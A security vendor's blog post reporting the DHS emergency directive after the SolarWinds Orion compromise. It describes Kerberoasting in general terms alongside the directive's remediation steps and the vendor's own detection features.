DHS Calls Out Kerberoasting In Directive Following Russian Hack

Sophisticated nation-state hackers who compromised a string of federal agencies in recent months used Kerberoasting to steal the passwords of agency employees and move laterally within compromised government networks, according to the latest guidance from the Department of Homeland Security.

In an Emergency Directive published on Sunday, the agency instructs federal agencies to “take action to remediate kerberoasting,” including engaging with third party organizations that have experience “eradicating APTs from enterprise networks,” a reference to so-called “advanced, persistent threats.” As we noted in a QOMPLX Knowledge blog post in May, Kerberoasting is a pervasive attack technique, Kerberoasting involves the offline cracking of Active Directory service account credential hashes that are stolen from memory on a compromised system.

Kerberoasting and Lateral Movement

As a post-exploitation technique, Kerberoasting is useful because an attacker does not need domain administrator credentials to pull off the attack—any domain user account is sufficient. Also, attackers can extract service account credential hashes without sending packets to the target, which is useful in avoiding detection.

The DHS Directive comes as U.S. government agencies are scrambling to assess the damage from a widespread hack believed to be linked to Russian government-backed hackers variously identified as “UNC2452” (FireEye) and “Cozy Bear” (CrowdStrike).

Supply Chain Hack Kicked Off Sophisticated Operation

The attack began with a compromise of software updates from SolarWinds, a provider of network management and monitoring tools that counts a number of government agencies as customers. According to reports, as many as 18,000 organizations downloaded the compromised SolarWinds Orion software prior to discovery of the attack, including the security firm FireEye which has published many of the details of the attack in an effort to warn customers and the public.

In a blog post, FireEye said the attack was sophisticated and human-directed, rather than automated and indiscriminate. Attackers compromised a signed, SolarWinds Orion DLL with a backdoor that communicates via HTTP to third party servers. FireEye has designated the DLL “SUNBURST.”

DHS Mandates Rapid Response

In its directive, DHS instructed agencies to immediately disconnect or “power down” affected versions of the Orion product. DHS also provided instructions for government agencies hoping to detect breaches and instructed them to report any incidents to the Cybersecurity and Infrastructure Security Agency (CISA) by the end of day, Monday.

DHS guidance to agencies borrows from CISA’s own alert and ‘best practices’ for avoiding kerberoasting attacks, including “cycling” (resetting) any Active Directory service accounts and implementing strong (25 characters or longer) and unique passwords for any account, which will make cracking impractical.  Agencies are also instructed to require Active Directory service accounts to use strong encryption and not vulnerable encryption packages such as DES, RC4, or AES128 bit encryption.

Attackers Looking High and Low

Experts note that the SolarWinds Orion product is a rich target for would-be attackers. As a network management platform, it has privileged access to sensitive IT assets across a network environment.

The attack suggests that sophisticated actors are looking both “high” and “low” in efforts to compromise sophisticated organizations. Along with authentication, logging and monitoring infrastructure like Orion is part of an organization’s Critical Controls Infrastructure, said Andy Jaquith, CISO and QOMPLX. “Critical Controls Infrastructure is the ‘central nervous system’ for the CISO. Monitoring agents aren’t quite as high up the enterprise control hierarchy as authentication is, but they are attractive targets because they are ubiquitously deployed and generally possess high privileges,” said Jaquith. “Threat actors go after CCI because of their privileged position. Successful compromises facilitate large-scale breaches.”

How QOMPLX Spots Kerberoasting

Technology such as QOMPLX’s monitors for telltale signs of Kerberoasting attacks, such as domain user accounts requesting large numbers of service tickets (Event 4769).

In addition, QOMPLX’s Privilege Assurance tool reduces the likelihood of service accounts being over-permissioned. For example, these service accounts are often found to be members of the Domain Admin group or other groups that have been granted excessive permissions, far beyond what is required of them to access a service. Among other detections, QOMPLX:CYBER monitors Windows Event Logs for suspicious actions (for example: use of RC4 encryption) by comparing transaction history with Domain Controller logs which provide coverage for establishing behavioral indicators of attempted Kerberoasting activity. Also, using Q:CYBER’s Windowed Rules feature and tactics like Active Directory “honeytokens,” organizations can detect Kerberoasting attacks in real time.

Read our post on Kerberoasting or our QOMPLX Knowledge series for more information on identifying and stopping common Active Directory attacks.